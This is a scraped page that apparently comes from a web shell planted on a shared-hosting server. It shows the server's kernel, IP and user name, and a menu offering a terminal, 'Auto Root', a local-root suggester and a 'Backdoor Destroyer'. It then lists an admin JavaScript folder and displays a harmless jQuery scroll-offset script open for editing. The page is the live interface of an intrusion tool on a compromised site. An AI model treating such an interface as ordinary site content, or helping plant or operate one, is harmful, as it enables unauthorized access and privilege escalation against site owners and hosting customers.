Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 3.137.180.196
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
ornolevaxo.online /
app /
admin /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
chart.js
7.82
KB
-rw-r--r--
2023-04-17 05:33
dashboard.js
6.87
KB
-rw-r--r--
2023-04-17 05:33
documentation.js
835
B
-rw-r--r--
2023-04-17 05:33
file-upload.js
398
B
-rw-r--r--
2023-04-17 05:33
hoverable-collapse.js
806
B
-rw-r--r--
2023-04-17 05:33
off-canvas.js
185
B
-rw-r--r--
2023-04-17 05:33
tabs.js
974
B
-rw-r--r--
2023-04-17 05:33
template.js
1.96
KB
-rw-r--r--
2023-04-17 05:33
todolist.js
952
B
-rw-r--r--
2023-04-17 05:33
tooltips.js
809
B
-rw-r--r--
2023-04-17 05:33
Save
Rename
(function($) { 'use strict'; $(function() { // The function actually applying the offset function offsetAnchor() { if (location.hash.length !== 0) { // window.scrollTo(window.scrollX, window.scrollY - 140); $("html").animate({ scrollTop: $(location.hash).offset().top - 160 }, 500); } } // Captures click events of all <a> elements with href starting with # $(document).on('click', 'a[href^="#"]', function(event) { // Click events are captured before hashchanges. Timeout // causes offsetAnchor to be called after the page jump. window.setTimeout(function() { offsetAnchor(); }, 0); }); // Set the offset when entering page with hash present in the url window.setTimeout(offsetAnchor, 0); }); })(jQuery);